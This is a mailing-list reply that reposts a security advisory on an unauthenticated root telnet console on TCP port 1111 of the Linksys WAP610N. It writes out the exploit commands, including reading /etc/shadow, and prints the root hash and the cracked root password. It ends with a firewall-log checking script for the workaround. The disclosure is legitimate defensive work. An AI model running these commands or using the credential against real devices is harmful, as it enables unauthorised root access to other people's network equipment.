Re: Linksys WAP610N Unauthenticated Root Console
The correct public disclosure date is 10/02/2011
On Thursday 10 February 2011 00:12:10, Matteo Ignaccolo wrote:
> Secure Network - Security Research Advisory
> Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
> Systems affected: WAP610N (Firmware Version: 1.0.01)
> Systems not affected: --
> Severity: High
> Local/Remote: Remote
> Vendor URL: http://www.linksysbycisco.com
> Author(s): Matteo Ignaccolo m.ignaccolo@xxxxxxxxxxxxxxxx
> Vendor disclosure: 14/06/2010
> Vendor acknowledged: 14/06/2010
> Vendor bugfix: 14/12/2010 (reply to our request for update)
> Vendor patch release: ??
> Public disclosure: 10/02/2010
> Advisory number: SN-2010-08
> Advisory URL:
> *** SUMMARY ***
> Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.
> An unauthenticated remote textual administration console has been found that
> allows an attacker to run system commands as the root user.
> *** VULNERABILITY DETAILS ***
> telnet <access-point IP> 1111
> Command> system id
> Output> uid=0(root) gid=0(root)
> Command> system cat /etc/shadow
> Output> root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
> Output> bin:*:10933:0:99999:7:::
> Output> daemon:*:10933:0:99999:7:::
> Output> adm:*:10933:0:99999:7:::
> Output> lp:*:10933:0:99999:7:::
> Output> sync:*:10933:0:99999:7:::
> Output> shutdown:*:10933:0:99999:7:::
> Output> halt:*:10933:0:99999:7:::
> Output> uucp:*:10933
> root password is "wlan" (cracked with MDcrack http://mdcrack.openwall.net)
> List of console's command:
> *** EXPLOIT ***
> Attackers may exploit these issues through a common telnet client as
> explained above.
> *** FIX INFORMATION ***
> No patch is available.
> *** WORKAROUNDS ***
> Put access points on separate wired network and filter network traffic
> to/from 1111 tcp port.
> *** LEGAL NOTICES ***
> Secure Network (www.securenetwork.it) is an information security company,
> which provides consulting and training services, and engages in security
> research and development.
> We are committed to open, full disclosure of vulnerabilities, cooperating
> whenever possible with software developers for properly handling
> This advisory is copyright 2009 Secure Network S.r.l. Permission is
> hereby granted for the redistribution of this alert, provided that it is
> not altered except by reformatting it, and that due credit is given. It
> may not be edited in any way without the express consent of Secure Network
> S.r.l. Permission is explicitly given for insertion in vulnerability
> databases and similars, provided that due credit is given to Secure
> The information in the advisory is believed to be accurate at the time of
> publishing based on currently available information. This information is
> provided as-is, as a free service to the community by Secure Network
> research staff. There are no warranties with regard to this information.
> Secure Network does not accept any liability for any direct, indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.
> If you have any comments or inquiries, or any issue with what is reported
> in this advisory, please inform us as soon as possible.
> E-mail: securenetwork@xxxxxxxxxxxxxxxx
> GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
> Phone: +39 02 24 12 67 88
Dott. Ing. Matteo Ignaccolo
Secure Network S.r.l.
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia
Tel: +39 02.24126788 Mobile: +39 335.1778376
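
An added example, not part of the original advisory or of this reply: one way to check that the workaround's filter on TCP port 1111 is holding, by scanning gateway firewall logs for traffic to or from that port on the access-point network. The subnet, the log lines (netfilter LOG key=value layout) and the function names are constructed assumptions; only the port number comes from the advisory.

```python
import ipaddress
import re

# Assumption: the separate wired network holding the access points (constructed value).
AP_NET = ipaddress.ip_network("192.0.2.0/28")
CONSOLE_PORT = 1111  # TCP port of the console, as given in the advisory

FIELD = re.compile(r"\b([A-Z]+)=(\S*)")

# Constructed sample lines in the netfilter LOG target's key=value layout.
SAMPLE_LOG = """\
Feb 10 09:14:02 gw kernel: FWD IN=eth0 OUT=eth2 SRC=10.1.4.23 DST=192.0.2.5 LEN=60 PROTO=TCP SPT=51544 DPT=1111 SYN
Feb 10 09:14:02 gw kernel: FWD IN=eth2 OUT=eth0 SRC=192.0.2.5 DST=10.1.4.23 LEN=60 PROTO=TCP SPT=1111 DPT=51544 ACK SYN
Feb 10 09:15:40 gw kernel: FWD IN=eth0 OUT=eth2 SRC=10.1.4.23 DST=192.0.2.5 LEN=60 PROTO=TCP SPT=51600 DPT=80 SYN
Feb 10 09:16:11 gw kernel: FWD IN=eth0 OUT=eth1 SRC=10.1.4.40 DST=198.51.100.9 LEN=60 PROTO=TCP SPT=40000 DPT=1111 SYN
Feb 10 09:17:30 gw kernel: FWD IN=eth0 OUT=eth2 SRC=10.1.4.23 DST=192.0.2.5 LEN=45 PROTO=UDP SPT=5353 DPT=1111
"""


def _in_ap_net(addr):
    """True if addr parses as an IP address inside the access-point network."""
    try:
        return ipaddress.ip_address(addr) in AP_NET
    except ValueError:
        return False


def console_flows(log_text):
    """Return (direction, peer, access_point) for TCP packets to or from port 1111 on an AP."""
    hits = []
    for line in log_text.splitlines():
        f = dict(FIELD.findall(line))
        if f.get("PROTO") != "TCP":
            continue  # the advisory's workaround concerns the TCP port only
        if f.get("DPT") == str(CONSOLE_PORT) and _in_ap_net(f.get("DST", "")):
            hits.append(("to-console", f.get("SRC"), f["DST"]))
        elif f.get("SPT") == str(CONSOLE_PORT) and _in_ap_net(f.get("SRC", "")):
            hits.append(("from-console", f.get("DST"), f["SRC"]))
    return hits


if __name__ == "__main__":
    for direction, peer, ap in console_flows(SAMPLE_LOG):
        print(f"{direction}: peer={peer} ap={ap}")
```

A "from-console" hit means an access point answered on port 1111, so the filter let the inbound packet through; a lone "to-console" hit logged by a drop rule only records an attempt.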